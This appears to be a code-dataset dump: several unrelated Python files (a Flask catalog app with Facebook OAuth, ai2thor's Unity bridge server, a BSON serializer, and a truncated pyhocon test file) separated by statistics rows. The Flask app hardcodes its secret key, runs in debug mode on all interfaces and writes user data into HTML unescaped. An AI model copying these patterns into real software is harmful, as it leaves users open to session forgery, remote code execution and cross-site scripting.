elif provider == 'facebook':
access_token = request.data
url = 'https://graph.facebook.com/oauth/access_token?grant_type=' \
'fb_exchange_token&client_id={}&client_secret={}&' \
'fb_exchange_token={}'.format(APP_ID, APP_SECRET, access_token) # noqa
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Strip expire tag from access token
access_token = result['access_token']
url = 'https://graph.facebook.com/v2.11/me?access_token={}&fields=' \
'name,id,email,picture'.format(access_token) # noqa
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Get user info
data = result
login_session['access_token'] = access_token
login_session['provider'] = 'facebook'
login_session['username'] = data['name']
login_session['email'] = data['email']
login_session['picture'] = data['picture']['data']['url']
login_session['facebook_id'] = data['id']
# Checks if user exists in DB
if getUserID(login_session['email']) is not None:
login_session['user_id'] = getUserID(login_session['email'])
else:
createUser(login_session)
login_session['user_id'] = getUserID(login_session['email'])
# Stores token in session
user = session.query(User).filter_by(email=login_session['email']).first()
token = user.generate_auth_token(600)
login_session['token'] = token
output = ''
output += '<h1>Welcome, {}!</h1>'.format(login_session['username'])
output += '<img src="{}" '.format(login_session['picture'])
output += 'style = "width: 300px; height: 300px; border-radius: 150px;' \
'-webkit-border-radius: 150px;-moz-border-radius: 150px;">'
flash('Now logged in as {}'.format(login_session['username']))
return output
def createUser(login_session):
newUser = User(username=login_session['username'],
email=login_session['email'],
picture=login_session['picture'])
session.add(newUser)
session.commit()
def getUserID(email):
try:
user = session.query(User).filter_by(email=email).one()
return user.id
except:
return None
# Revoke current user's token and reset login_session
@app.route('/logout')
def logout():
if 'provider' in login_session:
if login_session['provider'] == 'google':
del login_session['gplus_id']
if login_session['provider'] == 'facebook':
del login_session['facebook_id']
del login_session['access_token']
del login_session['username']
del login_session['picture']
del login_session['email']
del login_session['token']
flash("You have been successfully logged out.")
return redirect(url_for('showCatalog'))
else:
flash("No user has been logged in.")
return redirect(url_for('showCatalog'))
# JSON APIs to view Category Information.
@app.route('/catalog/JSON')
def catalogJSON():
categories = session.query(Category).all()
items = session.query(Item).order_by(Item.category_id).limit(3)
return jsonify(Categories=[c.serialize for c in categories],
Items=[i.serialize for i in items])
@app.route('/catalog/<category>/JSON')
def catalogCategoryJSON(category):
itemCategory = session.query(Category).filter_by(name=category).first()
items = session.query(Item).filter_by(category_id=itemCategory.id).all()
return jsonify(Categories=[itemCategory.serialize],
Items=[i.serialize for i in items])
@app.route('/catalog/<category>/<item>/JSON')
def categoryItemJSON(category, item):
itemCategory = session.query(Category).filter_by(name=category).first()
item = session.query(Item).filter_by(name=item,
category_id=itemCategory.id).first()
return jsonify(Category=[itemCategory.serialize],
Item=[item.serialize])
# Show all Categories and the latest items
@app.route('/')
@app.route('/catalog')
def showCatalog():
categories = session.query(Category).all()
items = session.query(Item).order_by(Item.category_id).limit(3)
if 'token' not in login_session:
return render_template('publiccatalog.html',
categories=categories, items=items)
else:
return render_template('catalog.html',
categories=categories, items=items)
# Show Items in a category item
@app.route('/catalog/<category>/')
def showCatalogCategory(category):
itemCategory = session.query(Category).filter_by(name=category).first()
items = session.query(Item).filter_by(category_id=itemCategory.id).all()
categories = session.query(Category).all()
if 'token' not in login_session:
return render_template('publiccategory.html',
items=items, category=itemCategory,
categories=categories)
else:
return render_template('category.html', items=items,
category=itemCategory, categories=categories)
# Show an item in a category
@app.route('/catalog/<category>/<item>/')
def showCategoryItem(category, item):
category = session.query(Category).filter_by(name=category).first()
item = session.query(Item).filter_by(name=item,
category_id=category.id).first()
categories = session.query(Category).all()
if 'token' not in login_session:
return render_template('publiccategoryitem.html',
item=item, category=category,
categories=categories)
return render_template('categoryitem.html', item=item,
category=category, categories=categories)
# Create a new item
@app.route('/catalog/category/new/', methods=['GET', 'POST'])
def newCategoryItem():
if 'token' not in login_session:
return redirect('/login')
categories = session.query(Category).all()
user = session.query(User).filter_by(email=login_session['email']).one()
if request.method == 'POST':
category = session.query(Category).filter_by(
name=request.form['category']).first()
newItem = Item(name=request.form['name'],
description=request.form['description'],
category_id=category.id, user_id=user.id)
session.add(newItem)
session.commit()
flash('New Item {} Successfully Added'.format(newItem.name))
return redirect(url_for('showCatalog'))
else:
return render_template('newcategoryitem.html', categories=categories)
# Edit a category item
@app.route('/catalog/<category>/<item>/edit', methods=['GET', 'POST'])
def editCategoryItem(category, item):
if 'token' not in login_session:
return redirect('/login')
user = session.query(User).filter_by(email=login_session['email']).first()
categoryItem = session.query(Category).filter_by(name=category).first()
editedItem = session.query(Item).filter_by(
name=item, category_id=categoryItem.id).first()
categories = session.query(Category).all()
if user.id != editedItem.user_id:
flash('You are not authorized to edit {}.'.format(item))
return redirect(url_for('showCategoryItem', category=categoryItem.name,
item=editedItem.name))
if request.method == 'POST':
if request.form['name']:
editedItem.name = request.form['name']
if request.form['description']:
editedItem.description = request.form['description']
if request.form['category']:
category = session.query(Category).filter_by(
name=request.form['category']).first()
editedItem.category_id = category.id
session.add(editedItem)
session.commit()
flash('Item Successfully Edited')
return redirect(url_for('showCategoryItem',
category=request.form['category'],
item=editedItem.name))
else:
return render_template('editcategoryitem.html',
category=categoryItem.name,
item=editedItem.name, categories=categories,
editedItem=editedItem)
# Delete a category item
@app.route('/catalog/<category>/<item>/delete', methods=['GET', 'POST'])
def deleteCategoryItem(category, item):
if 'token' not in login_session:
return redirect('/login')
user = session.query(User).filter_by(email=login_session['email']).first()
categoryItem = session.query(Category).filter_by(name=category).first()
itemToDelete = session.query(Item).filter_by(
name=item, category_id=categoryItem.id).first()
if user.id != itemToDelete.user_id:
flash('You are not authorized to delete {}.'.format(item))
return redirect(url_for('showCategoryItem', category=categoryItem.name,
item=itemToDelete.name))
if request.method == 'POST':
session.delete(itemToDelete)
session.commit()
flash('Item Successfully Deleted')
return redirect(url_for('showCatalog'))
else:
return render_template('deletecategoryitem.html',
category=categoryItem.name,
item=itemToDelete.name)
if __name__ == '__main__':
app.secret_key = 'N10kuN!'
app.debug = True
app.run(host='0.0.0.0', port=5000)
| 39.296636
| 79
| 0.63323
| 1,440
| 12,850
| 5.526389
| 0.172917
| 0.073888
| 0.035185
| 0.026137
| 0.471224
| 0.408897
| 0.388791
| 0.327344
| 0.26753
| 0.241267
| 0
| 0.005621
| 0.238521
| 12,850
| 326
| 80
| 39.417178
| 0.807665
| 0.059767
| 0
| 0.338645
| 0
| 0
| 0.171167
| 0.032821
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055777
| false
| 0
| 0.043825
| 0
| 0.211155
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
139f6d8d256ac39b6d5d2e96db49c8e71d3fc905
| 20,472
|
py
|
Python
|
ai2thor/server.py
|
aliang8/ai2thor
|
3ef92cf5437e2d60127c77bd59d5b7394eebb36c
|
[
"Apache-2.0"
] | 1
|
2019-04-11T14:51:04.000Z
|
2019-04-11T14:51:04.000Z
|
ai2thor/server.py
|
aliang8/ai2thor
|
3ef92cf5437e2d60127c77bd59d5b7394eebb36c
|
[
"Apache-2.0"
] | null | null | null |
ai2thor/server.py
|
aliang8/ai2thor
|
3ef92cf5437e2d60127c77bd59d5b7394eebb36c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright Allen Institute for Artificial Intelligence 2017
"""
ai2thor.server
Handles all communication with Unity through a Flask service. Messages
are sent to the controller using a pair of request/response queues.
"""
import json
import logging
import sys
import os
import os.path
try:
from queue import Empty
except ImportError:
from Queue import Empty
import time
import warnings
from flask import Flask, request, make_response, abort
import werkzeug
import werkzeug.serving
import werkzeug.http
import numpy as np
from enum import Enum
from ai2thor.util.depth import apply_real_noise, generate_noise_indices
logging.getLogger('werkzeug').setLevel(logging.ERROR)
werkzeug.serving.WSGIRequestHandler.protocol_version = 'HTTP/1.1'
MAX_DEPTH = 5000
# get with timeout to allow quit
def queue_get(que):
res = None
while True:
try:
res = que.get(block=True, timeout=0.5)
break
except Empty:
pass
return res
class NumpyAwareEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.generic):
return np.asscalar(obj)
return super(NumpyAwareEncoder, self).default(obj)
class BufferedIO(object):
def __init__(self, wfile):
self.wfile = wfile
self.data = []
def write(self, output):
self.data.append(output)
def flush(self):
self.wfile.write(b"".join(self.data))
self.wfile.flush()
def close(self):
return self.wfile.close()
@property
def closed(self):
return self.wfile.closed
class ThorRequestHandler(werkzeug.serving.WSGIRequestHandler):
def run_wsgi(self):
old_wfile = self.wfile
self.wfile = BufferedIO(self.wfile)
result = super(ThorRequestHandler, self).run_wsgi()
self.wfile = old_wfile
return result
class MultiAgentEvent(object):
def __init__(self, active_agent_id, events):
self._active_event = events[active_agent_id]
self.metadata = self._active_event.metadata
self.screen_width = self._active_event.screen_width
self.screen_height = self._active_event.screen_height
self.events = events
self.third_party_camera_frames = []
# XXX add methods for depth,sem_seg
@property
def cv2img(self):
return self._active_event.cv2img
def add_third_party_camera_image(self, third_party_image_data):
self.third_party_camera_frames.append(read_buffer_image(third_party_image_data, self.screen_width, self.screen_height))
def read_buffer_image(buf, width, height, flip_y=True, flip_x=False, dtype=np.uint8,
flip_rb_colors=False):
im_bytes = np.frombuffer(buf.tobytes(), dtype=dtype) if sys.version_info.major < 3 \
else np.frombuffer(buf, dtype=dtype)
im = im_bytes.reshape(height, width, -1)
if flip_y:
im = np.flip(im, axis=0)
if flip_x:
im = np.flip(im, axis=1)
if flip_rb_colors:
im = im[..., ::-1]
return im
def unique_rows(arr, return_index=False, return_inverse=False):
arr = np.ascontiguousarray(arr).copy()
b = arr.view(np.dtype((np.void, arr.dtype.itemsize * arr.shape[1])))
if return_inverse:
_, idx, inv = np.unique(b, return_index=True, return_inverse=True)
else:
_, idx = np.unique(b, return_index=True)
unique = arr[idx]
if return_index and return_inverse:
return unique, idx, inv
elif return_index:
return unique, idx
elif return_inverse:
return unique, inv
else:
return unique
class Event(object):
"""
Object that is returned from a call to controller.step().
This class wraps the screenshot that Unity captures as well
as the metadata sent about each object
"""
def __init__(self, metadata):
self.metadata = metadata
self.screen_width = metadata['screenWidth']
self.screen_height = metadata['screenHeight']
self.frame = None
self.depth_frame = None
self.normals_frame = None
self.flow_frame = None
self.color_to_object_id = {}
self.object_id_to_color = {}
self.instance_detections2D = None
self.instance_masks = {}
self.class_masks = {}
self.instance_segmentation_frame = None
self.class_segmentation_frame = None
self.class_detections2D = {}
self.process_colors()
self.process_visible_bounds2D()
self.third_party_camera_frames = []
self.third_party_class_segmentation_frames = []
self.third_party_instance_segmentation_frames = []
self.third_party_depth_frames = []
self.third_party_normals_frames = []
self.third_party_flows_frames = []
self.events = [self] # Ensure we have a similar API to MultiAgentEvent
@property
def image_data(self):
warnings.warn("Event.image_data has been removed - RGB data can be retrieved from event.frame and encoded to an image format")
return None
def process_visible_bounds2D(self):
if self.instance_detections2D and len(self.instance_detections2D) > 0:
for obj in self.metadata['objects']:
obj['visibleBounds2D'] = (obj['visible'] and obj['objectId'] in self.instance_detections2D)
def process_colors(self):
if 'colors' in self.metadata and self.metadata['colors']:
for color_data in self.metadata['colors']:
name = color_data['name']
c_key = tuple(color_data['color'])
self.color_to_object_id[c_key] = name
self.object_id_to_color[name] = c_key
def objects_by_type(self, object_type):
return [obj for obj in self.metadata['objects'] if obj['objectType'] == object_type]
def process_colors_ids(self):
if self.instance_segmentation_frame is None:
return
MIN_DETECTION_LEN = 0
self.instance_detections2D = {}
unique_ids, unique_inverse = unique_rows(self.instance_segmentation_frame.reshape(-1, 3), return_inverse=True)
unique_inverse = unique_inverse.reshape(self.instance_segmentation_frame.shape[:2])
unique_masks = (np.tile(unique_inverse[np.newaxis, :, :], (len(unique_ids), 1, 1)) == np.arange(len(unique_ids))[:, np.newaxis, np.newaxis])
#for unique_color_ind, unique_color in enumerate(unique_ids):
for color_bounds in self.metadata['colorBounds']:
color = np.array(color_bounds['color'])
color_name = self.color_to_object_id.get(tuple(int(cc) for cc in color), 'background')
cls = color_name
simObj = False
if '|' in cls:
cls = cls.split('|')[0]
simObj = True
bb = np.array(color_bounds['bounds'])
bb[[1,3]] = self.metadata['screenHeight'] - bb[[3,1]]
if not((bb[2] - bb[0]) < MIN_DETECTION_LEN or (bb[3] - bb[1]) < MIN_DETECTION_LEN):
if cls not in self.class_detections2D:
self.class_detections2D[cls] = []
self.class_detections2D[cls].append(bb)
color_ind = np.argmin(np.sum(np.abs(unique_ids - color), axis=1))
if simObj:
self.instance_detections2D[color_name] = bb
self.instance_masks[color_name] = unique_masks[color_ind, ...]
if cls not in self.class_masks:
self.class_masks[cls] = unique_masks[color_ind, ...]
else:
self.class_masks[cls] = np.logical_or(self.class_masks[cls], unique_masks[color_ind, ...])
def _image_depth(self, image_depth_data, **kwargs):
image_depth = read_buffer_image(image_depth_data, self.screen_width, self.screen_height)
depth_format = kwargs['depth_format']
image_depth_out = image_depth[:,:,0] + image_depth[:,:,1] / np.float32(256) + image_depth[:,:,2] / np.float32(256 ** 2)
multiplier = 1.0
if depth_format != DepthFormat.Normalized:
multiplier = kwargs['camera_far_plane'] - kwargs['camera_near_plane']
elif depth_format == DepthFormat.Millimeters:
multiplier *= 1000
image_depth_out *= multiplier / 256.0
depth_image_float = image_depth_out.astype(np.float32)
if 'add_noise' in kwargs and kwargs['add_noise']:
depth_image_float = apply_real_noise(
depth_image_float,
self.screen_width,
indices=kwargs['noise_indices']
)
return depth_image_float
def add_image_depth_robot(self, image_depth_data, depth_format, **kwargs):
multiplier = 1.0
camera_far_plane = kwargs.pop('camera_far_plane', 1)
camera_near_plane = kwargs.pop('camera_near_plane', 0)
if depth_format == DepthFormat.Normalized:
multiplier = 1.0 / (camera_far_plane - camera_near_plane)
elif depth_format == DepthFormat.Millimeters:
multiplier = 1000.0
image_depth = read_buffer_image(
image_depth_data, self.screen_width, self.screen_height, **kwargs
).reshape(self.screen_height, self.screen_width) * multiplier
self.depth_frame = image_depth.astype(np.float32)
def add_image_depth(self, image_depth_data, **kwargs):
self.depth_frame = self._image_depth(image_depth_data, **kwargs)
def add_third_party_image_depth(self, image_depth_data, **kwargs):
self.third_party_depth_frames.append(self._image_depth(image_depth_data, **kwargs))
def add_third_party_image_normals(self, normals_data):
self.third_party_normals_frames.append(read_buffer_image(normals_data, self.screen_width, self.screen_height))
def add_image_normals(self, image_normals_data):
self.normals_frame = read_buffer_image(image_normals_data, self.screen_width, self.screen_height)
def add_third_party_image_flows(self, flows_data):
self.third_party_flows_frames.append(read_buffer_image(flows_data, self.screen_width, self.screen_height))
def add_image_flows(self, image_flows_data):
self.flows_frame = read_buffer_image(image_flows_data, self.screen_width, self.screen_height)
def add_third_party_camera_image(self, third_party_image_data):
self.third_party_camera_frames.append(read_buffer_image(third_party_image_data, self.screen_width, self.screen_height))
def add_image(self, image_data, **kwargs):
self.frame = read_buffer_image(image_data, self.screen_width, self.screen_height, **kwargs)
def add_image_ids(self, image_ids_data):
self.instance_segmentation_frame = read_buffer_image(image_ids_data, self.screen_width, self.screen_height)
self.process_colors_ids()
def add_third_party_image_ids(self, image_ids_data):
self.third_party_instance_segmentation_frames.append(read_buffer_image(image_ids_data, self.screen_width, self.screen_height))
def add_image_classes(self, image_classes_data):
self.class_segmentation_frame = read_buffer_image(image_classes_data, self.screen_width, self.screen_height)
def add_third_party_image_classes(self, image_classes_data):
self.third_party_class_segmentation_frames.append(read_buffer_image(image_classes_data, self.screen_width, self.screen_height))
def cv2image(self):
warnings.warn("Deprecated - please use event.cv2img")
return self.cv2img
@property
def cv2img(self):
return self.frame[...,::-1]
@property
def pose(self):
agent_meta = self.metadata['agent']
loc = agent_meta['position']
rotation = round(agent_meta['rotation']['y'] * 1000)
horizon = round(agent_meta['cameraHorizon'] * 1000)
return (round(loc['x'] * 1000), round(loc['z'] * 1000), rotation, horizon)
@property
def pose_discrete(self):
# XXX should have this as a parameter
step_size = 0.25
agent_meta = self.metadata['agent']
loc = agent_meta['position']
rotation = int(agent_meta['rotation']['y'] / 90.0)
horizon = int(round(agent_meta['cameraHorizon']))
return (int(loc['x'] / step_size), int(loc['z'] / step_size), rotation, horizon)
def get_object(self, object_id):
for obj in self.metadata['objects']:
if obj['objectId'] == object_id:
return obj
return None
class MultipartFormParser(object):
@staticmethod
def get_boundary(request_headers):
for h, value in request_headers:
if h == 'Content-Type':
ctype, ct_opts = werkzeug.http.parse_options_header(value)
boundary = ct_opts['boundary'].encode('ascii')
return boundary
return None
def __init__(self, data, boundary):
self.form = {}
self.files = {}
full_boundary = b'\r\n--' + boundary
view = memoryview(data)
i = data.find(full_boundary)
while i >= 0:
next_offset = data.find(full_boundary, i + len(full_boundary))
if next_offset < 0:
break
headers_offset = i + len(full_boundary) + 2
body_offset = data.find(b'\r\n\r\n', headers_offset)
raw_headers = view[headers_offset: body_offset]
body = view[body_offset + 4: next_offset]
i = next_offset
headers = {}
for header in raw_headers.tobytes().decode('ascii').strip().split("\r\n"):
k,v = header.split(':')
headers[k.strip()] = v.strip()
ctype, ct_opts = werkzeug.http.parse_options_header(headers['Content-Type'])
cdisp, cd_opts = werkzeug.http.parse_options_header(headers['Content-disposition'])
assert cdisp == 'form-data'
if 'filename' in cd_opts:
if cd_opts['name'] not in self.files:
self.files[cd_opts['name']] = []
self.files[cd_opts['name']].append(body)
else:
if ctype == 'text/plain' and 'charset' in ct_opts:
body = body.tobytes().decode(ct_opts['charset'])
if cd_opts['name'] not in self.form:
self.form[cd_opts['name']] = []
self.form[cd_opts['name']].append(body)
class DepthFormat(Enum):
Meters = 0,
Normalized = 1,
Millimeters = 2
class Server(object):
def __init__(
self,
request_queue,
response_queue,
host,
port=0,
threaded=False,
depth_format=DepthFormat.Meters,
add_depth_noise=False,
width=300,
height=300
):
app = Flask(__name__,
template_folder=os.path.realpath(
os.path.join(
os.path.dirname(os.path.abspath(__file__)), '..', 'templates')))
self.image_buffer = None
self.app = app
self.client_token = None
self.subscriptions = []
self.app.config.update(PROPAGATE_EXCEPTIONS=False, JSONIFY_PRETTYPRINT_REGULAR=False)
self.port = port
self.last_rate_timestamp = time.time()
self.frame_counter = 0
self.debug_frames_per_interval = 50
self.xwindow_id = None
self.wsgi_server = werkzeug.serving.make_server(host, self.port, self.app, threaded=threaded, request_handler=ThorRequestHandler)
# used to ensure that we are receiving frames for the action we sent
self.sequence_id = 0
self.last_event = None
self.camera_near_plane = 0.1
self.camera_far_plane = 20.0
self.depth_format = depth_format
self.add_depth_noise = add_depth_noise
self.noise_indices = None
if add_depth_noise:
assert width == height,\
"Noise supported with square dimension images only."
self.noise_indices = generate_noise_indices(width)
@app.route('/ping', methods=['get'])
def ping():
return 'pong'
@app.route('/train', methods=['post'])
def train():
if request.headers['Content-Type'].split(';')[0] == 'multipart/form-data':
form = MultipartFormParser(request.get_data(), MultipartFormParser.get_boundary(request.headers))
metadata = json.loads(form.form['metadata'][0])
token = form.form['token'][0]
else:
form = request
metadata = json.loads(form.form['metadata'])
token = form.form['token']
if self.client_token and token != self.client_token:
abort(403)
if self.frame_counter % self.debug_frames_per_interval == 0:
now = time.time()
# rate = self.debug_frames_per_interval / float(now - self.last_rate_timestamp)
self.last_rate_timestamp = now
# import datetime
# print("%s %s/s" % (datetime.datetime.now().isoformat(), rate))
if metadata['sequenceId'] != self.sequence_id:
raise ValueError("Sequence id mismatch: %s vs %s" % (
metadata['sequenceId'], self.sequence_id))
events = []
for i, a in enumerate(metadata['agents']):
e = Event(a)
image_mapping = dict(
image=e.add_image,
image_depth=lambda x: e.add_image_depth(
x,
depth_format=self.depth_format,
camera_near_plane=self.camera_near_plane,
camera_far_plane=self.camera_far_plane,
add_noise=self.add_depth_noise,
noise_indices=self.noise_indices
),
image_ids=e.add_image_ids,
image_classes=e.add_image_classes,
image_normals=e.add_image_normals,
image_flows=e.add_image_flows
)
for key in image_mapping.keys():
if key in form.files:
image_mapping[key](form.files[key][i])
third_party_image_mapping = dict(
image=e.add_image,
image_thirdParty_depth=lambda x: e.add_third_party_image_depth(
x,
depth_format=self.depth_format,
camera_near_plane=self.camera_near_plane,
camera_far_plane=self.camera_far_plane
),
image_thirdParty_image_ids=e.add_third_party_image_ids,
image_thirdParty_classes=e.add_third_party_image_classes,
image_thirdParty_normals=e.add_third_party_image_normals,
image_thirdParty_flows=e.add_third_party_image_flows
)
if a['thirdPartyCameras'] is not None:
for ti, t in enumerate(a['thirdPartyCameras']):
for key in third_party_image_mapping.keys():
if key in form.files:
third_party_image_mapping[key](form.files[key][ti])
events.append(e)
if len(events) > 1:
self.last_event = event = MultiAgentEvent(metadata['activeAgentId'], events)
else:
self.last_event = event = events[0]
for img in form.files.get('image-thirdParty-camera', []):
self.last_event.add_third_party_camera_image(img)
request_queue.put_nowait(event)
self.frame_counter += 1
next_action = queue_get(response_queue)
if 'sequenceId' not in next_action:
self.sequence_id += 1
next_action['sequenceId'] = self.sequence_id
else:
self.sequence_id = next_action['sequenceId']
resp = make_response(json.dumps(next_action, cls=NumpyAwareEncoder))
return resp
def start(self):
self.wsgi_server.serve_forever()
def set_init_params(self, init_params):
self.camera_near_plane = init_params['cameraNearPlane']
self.camera_far_plane = init_params['cameraFarPlane']
| 37.289617
| 148
| 0.621483
| 2,495
| 20,472
| 4.826854
| 0.164729
| 0.028232
| 0.021174
| 0.022088
| 0.315204
| 0.240056
| 0.19721
| 0.169642
| 0.125052
| 0.125052
| 0
| 0.010382
| 0.280139
| 20,472
| 548
| 149
| 37.357664
| 0.806813
| 0.039371
| 0
| 0.119904
| 0
| 0.002398
| 0.049934
| 0.001172
| 0
| 0
| 0
| 0
| 0.004796
| 1
| 0.107914
| false
| 0.002398
| 0.040767
| 0.014388
| 0.23741
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13a03223c85f270b2a1843680f883661d539e4c0
| 903
|
py
|
Python
|
anyser/impls/bson.py
|
Cologler/anyser-python
|
52afa0a62003adcfe269f47d81863e00381d8ff9
|
[
"MIT"
] | null | null | null |
anyser/impls/bson.py
|
Cologler/anyser-python
|
52afa0a62003adcfe269f47d81863e00381d8ff9
|
[
"MIT"
] | null | null | null |
anyser/impls/bson.py
|
Cologler/anyser-python
|
52afa0a62003adcfe269f47d81863e00381d8ff9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020~2999 - Cologler <skyoflw@gmail.com>
# ----------
#
# ----------
import bson
import struct
from ..err import SerializeError
from ..abc import *
from ..core import register_format
@register_format('bson', '.bson')
class BsonSerializer(ISerializer):
format_name = 'bson'
def loadb(self, b: bytes, options: dict) -> Any:
kwargs = {}
kwargs.update(Options.pop_origin_kwargs(options))
self.check_options(options)
try:
return bson.loads(b, **kwargs)
except Exception as e:
raise SerializeError(e)
def dumpb(self, obj, options: dict) -> bytes:
kwargs = {}
kwargs.update(Options.pop_origin_kwargs(options))
self.check_options(options)
try:
return bson.dumps(obj, **kwargs)
except Exception as e:
raise SerializeError(e)
| 25.083333
| 57
| 0.605759
| 102
| 903
| 5.27451
| 0.480392
| 0.052045
| 0.066915
| 0.092937
| 0.472119
| 0.472119
| 0.472119
| 0.472119
| 0.30855
| 0.30855
| 0
| 0.013393
| 0.255814
| 903
| 35
| 58
| 25.8
| 0.787202
| 0.108527
| 0
| 0.5
| 0
| 0
| 0.016291
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.208333
| 0
| 0.458333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13a130fcf753fdc5859f92859bfe939d85633259
| 69,875
|
py
|
Python
|
tests/test_config_parser.py
|
KevinMFong/pyhocon
|
091830001f2d44f91f0f8281fb119c87fd1f6660
|
[
"Apache-2.0"
] | 424
|
2015-01-03T02:48:46.000Z
|
2022-03-22T02:47:43.000Z
|
tests/test_config_parser.py
|
KevinMFong/pyhocon
|
091830001f2d44f91f0f8281fb119c87fd1f6660
|
[
"Apache-2.0"
] | 251
|
2015-02-03T20:47:53.000Z
|
2022-03-19T16:45:15.000Z
|
tests/test_config_parser.py
|
KevinMFong/pyhocon
|
091830001f2d44f91f0f8281fb119c87fd1f6660
|
[
"Apache-2.0"
] | 127
|
2015-01-09T14:31:49.000Z
|
2022-03-19T15:47:30.000Z
|
# -*- encoding: utf-8 -*-
import json
import os
import shutil
import tempfile
from collections import OrderedDict
from datetime import timedelta
from pyparsing import ParseBaseException, ParseException, ParseSyntaxException
import mock
import pytest
from pyhocon import (ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree)
from pyhocon.exceptions import (ConfigException, ConfigMissingException,
ConfigWrongTypeException)
try:
from dateutil.relativedelta import relativedelta as period
except Exception:
from datetime import timedelta as period
class TestConfigParser(object):
def test_parse_simple_value(self):
config = ConfigFactory.parse_string(
"""t = {
c = 5
"d" = true
e.y = {
f: 7
g: "hey dude!"
h: hey man
i = \"\"\"
"first line"
"second" line
\"\"\"
}
j = [1, 2, 3]
u = 192.168.1.3/32
g = null
}
"""
)
assert config.get_string('t.c') == '5'
assert config.get_int('t.c') == 5
assert config.get_float('t.c') == 5.0
assert config.get('t.e.y.f') == 7
assert config.get('t.e.y.g') == 'hey dude!'
assert config.get('t.e.y.h') == 'hey man'
assert [v.strip() for v in config.get('t.e.y.i').split('\n')] == ['', '"first line"', '"second" line', '']
assert config.get_bool('t.d') is True
assert config.get_int('t.e.y.f') == 7
assert config.get('t.j') == [1, 2, 3]
assert config.get('t.u') == '192.168.1.3/32'
assert config.get_int('t.g') is None
assert config.get_float('t.g') is None
assert config.get_string('t.g') is None
assert config.get_bool('t.g') is None
assert config.get_list('t.g') is None
assert config.get_config('t.g') is None
@pytest.mark.parametrize('forbidden_char', ['+', '`', '^', '?', '!', '@', '*', '&'])
def test_fail_parse_forbidden_characters(self, forbidden_char):
with pytest.raises(ParseBaseException):
ConfigFactory.parse_string('a: hey man{}'.format(forbidden_char))
@pytest.mark.parametrize('forbidden_char', ['$', '"'])
def test_fail_parse_forbidden_characters_in_context(self, forbidden_char):
with pytest.raises(ParseException):
ConfigFactory.parse_string('a: hey man{}'.format(forbidden_char))
@pytest.mark.parametrize('forbidden_char', ['+', '`', '^', '?', '!', '@', '*', '&'])
def test_parse_forbidden_characters_quoted(self, forbidden_char):
value = "hey man{}".format(forbidden_char)
config = ConfigFactory.parse_string('a: "{}"'.format(value))
assert config.get_string("a") == value
def test_parse_with_enclosing_brace(self):
config = ConfigFactory.parse_string(
"""
{
a: {
b: 5
}
}
"""
)
assert config.get_string('a.b') == '5'
@pytest.mark.parametrize('data_set', [
('a: 1 minutes', period(minutes=1)),
('a: 1minutes', period(minutes=1)),
('a: 2 minute', period(minutes=2)),
('a: 3 m', period(minutes=3)),
('a: 3m', period(minutes=3)),
('a: 3 min', '3 min'),
('a: 4 seconds', period(seconds=4)),
('a: 5 second', period(seconds=5)),
('a: 6 s', period(seconds=6)),
('a: 6 sec', '6 sec'),
('a: 7 hours', period(hours=7)),
('a: 8 hour', period(hours=8)),
('a: 9 h', period(hours=9)),
('a: 10 weeks', period(weeks=10)),
('a: 11 week', period(weeks=11)),
('a: 12 w', period(weeks=12)),
('a: 10 days', period(days=10)),
('a: 11 day', period(days=11)),
('a: 12 d', period(days=12)),
('a: 110 microseconds', period(microseconds=110)),
('a: 111 microsecond', period(microseconds=111)),
('a: 112 micros', period(microseconds=112)),
('a: 113 micro', period(microseconds=113)),
('a: 114 us', period(microseconds=114)),
('a: 110 milliseconds', timedelta(milliseconds=110)),
('a: 111 millisecond', timedelta(milliseconds=111)),
('a: 112 millis', timedelta(milliseconds=112)),
('a: 113 milli', timedelta(milliseconds=113)),
('a: 114 ms', timedelta(milliseconds=114)),
('a: 110 nanoseconds', period(microseconds=0)),
('a: 11000 nanoseconds', period(microseconds=11)),
('a: 1110000 nanosecond', period(microseconds=1110)),
('a: 1120000 nanos', period(microseconds=1120)),
('a: 1130000 nano', period(microseconds=1130)),
('a: 1140000 ns', period(microseconds=1140)),
])
def test_parse_string_with_duration(self, data_set):
config = ConfigFactory.parse_string(data_set[0])
assert config['a'] == data_set[1]
def test_parse_string_with_duration_with_long_unit_name(self):
config = ConfigFactory.parse_string(
"""
a: foo
b: 10 weeks
c: bar
"""
)
assert config['b'] == period(weeks=10)
def test_parse_with_list_mixed_types_with_durations_and_trailing_comma(self):
config = ConfigFactory.parse_string(
"""
a: foo
b: [a, 1, 10 weeks, 5 minutes,]
c: bar
"""
)
assert config['b'] == ['a', 1, period(weeks=10), period(minutes=5)]
def test_parse_with_enclosing_square_bracket(self):
config = ConfigFactory.parse_string("[1, 2, 3]")
assert config == [1, 2, 3]
def test_quoted_key_with_dots(self):
config = ConfigFactory.parse_string(
"""
"a.b.c.d": 3
t {
"d": {
"c": 5
}
}
k {
"b.f.d": 7
}
"""
)
assert config['"a.b.c.d"'] == 3
assert config['t.d.c'] == 5
assert config['k."b.f.d"'] == 7
def test_dotted_notation_merge(self):
config = ConfigFactory.parse_string(
"""
a {
b = foo
c = bar
}
a.c = ${a.b}" "${a.b}
